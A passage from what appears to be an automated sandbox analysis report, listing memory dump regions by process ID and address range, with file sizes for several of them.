                                                                                                              • memory/4748-270-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4768-214-0x0000019F22600000-0x0000019F22672000-memory.dmp
                                                                                                                Filesize

                                                                                                                456KB

                                                                                                              • memory/4768-174-0x00007FF7977E4060-mapping.dmp
                                                                                                              • memory/4824-153-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4888-301-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4984-154-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4984-157-0x00000000008A0000-0x0000000000935000-memory.dmp
                                                                                                                Filesize

                                                                                                                596KB

                                                                                                              • memory/4984-158-0x0000000000400000-0x00000000004C4000-memory.dmp
                                                                                                                Filesize

                                                                                                                784KB

                                                                                                              • memory/5024-357-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5124-316-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5192-368-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5296-288-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5388-193-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5408-360-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5420-306-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5456-355-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5540-347-0x0000000006F83000-0x0000000006F84000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-337-0x0000000007DD0000-0x0000000007DD1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-269-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5540-338-0x0000000007CF0000-0x0000000007CF1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-340-0x0000000006F82000-0x0000000006F83000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-331-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5540-339-0x0000000006F80000-0x0000000006F81000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-334-0x0000000006DC0000-0x0000000006DC1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-335-0x00000000075C0000-0x00000000075C1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5540-336-0x00000000074D0000-0x00000000074D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5544-361-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5600-305-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5608-344-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5628-281-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5640-321-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5688-245-0x0000017F2B130000-0x0000017F2B17B000-memory.dmp
                                                                                                                Filesize

                                                                                                                300KB

                                                                                                              • memory/5688-246-0x0000017F2B3D0000-0x0000017F2B442000-memory.dmp
                                                                                                                Filesize

                                                                                                                456KB

                                                                                                              • memory/5688-307-0x0000017F2DA00000-0x0000017F2DB05000-memory.dmp
                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/5688-242-0x00007FF7977E4060-mapping.dmp
                                                                                                              • memory/5704-348-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5724-351-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5744-328-0x0000000000400000-0x0000000000D24000-memory.dmp
                                                                                                                Filesize

                                                                                                                9.1MB

                                                                                                              • memory/5744-327-0x0000000001640000-0x0000000001F4A000-memory.dmp
                                                                                                                Filesize

                                                                                                                9.0MB

                                                                                                              • memory/5744-324-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5752-363-0x000000000041622E-mapping.dmp
                                                                                                              • memory/5772-350-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5776-278-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5776-293-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                Filesize

                                                                                                                40.0MB

                                                                                                              • memory/5776-292-0x0000000004850000-0x00000000048E1000-memory.dmp
                                                                                                                Filesize

                                                                                                                580KB

                                                                                                              • memory/5832-349-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5840-365-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5856-277-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5940-317-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5952-362-0x0000000000416266-mapping.dmp
                                                                                                              • memory/5980-162-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6036-314-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6072-359-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6092-299-0x0000000000030000-0x000000000003C000-memory.dmp
                                                                                                                Filesize

                                                                                                                48KB

                                                                                                              • memory/6092-289-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6116-253-0x0000000003710000-0x0000000003720000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/6116-247-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/6116-239-0x0000000000000000-mapping.dmp